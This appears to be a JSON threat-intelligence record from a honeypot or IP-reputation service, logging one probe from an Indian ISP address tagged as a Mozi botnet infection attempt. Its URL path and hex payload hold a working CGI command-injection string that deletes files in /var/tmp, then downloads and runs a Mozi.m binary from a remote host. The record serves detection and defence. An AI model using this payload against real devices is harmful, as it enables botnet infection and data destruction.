{"ip":"103.197.112.191","total_events":1,"verdict":{"verdict":"scanning","label":"Scanning for known vulnerabilities","detail":"1 exploit-path probe(s)","confidence":"medium","network_type":"nsp"},"first_seen":"2026-06-20T08:01:49","last_seen":"2026-06-20T08:01:49","events_24h":0,"events_7d":1,"geo":{"country_code":"IN","country_name":"India","region":"Tamil Nadu","city":"Tiruvallur","lat":13.1425,"lon":79.9064,"asn":24186,"org":"RailTel Corporation of India Ltd"},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as24186","label":"Railtel Corporation Of India","category":"isp","url":"https://www.peeringdb.com/asn/24186"},"cve_matches":[],"top_ports":[{"port":8443,"proto":"tcp","label":"HTTPS-alt","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge10nn0000_000000000000"]},"fingerprint_peers":{"ge10nn0000_000000000000":2044},"user_agents":[],"timeline":[{"date":"2026-06-20","count":1}],"recent_events":[{"timestamp":"2026-06-20T08:01:49","port":8443,"proto":"tcp","app_proto":"","app_protocol":"http","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.197.112.191:35184/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m","summary":"","payload_hex":"474554202f6367692d62696e2f3b6364247b4946537d2f7661722f746d703b726d247b4946537d2d7266247b4946537d2a3b247b4946537d77676574247b4946537d687474703a2f2f3130332e3139372e3131322e3139313a33353138342f4d6f7a692e6d3b247b4946537d7368247b4946537d2f7661722f746d702f4d6f7a692e6d20485454502f312e300d0a0d0a","method":"GET","user_agent":"","community_id":"1:IVvAhU5YMFGSxVHTBsUX0XqKj+k=","ja3":"","session":"9986bf46-30a5-49f5-ac7e-2079b2021cb4","seq":1,"duration_ms":100,"bytes_in":144,"bytes_out":80}],"http_methods":[{"method":"GET","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.197.112.191:35184/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":null,"tags":[{"tag_id":"Mozi Botnet Infection Attempt","tag_type":"malware","title":"Mozi Botnet Infection Attempt","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"Mozi.m","reference_urls":[]}],"data_as_of":"2026-06-25T01:48:17.869671+00:00"}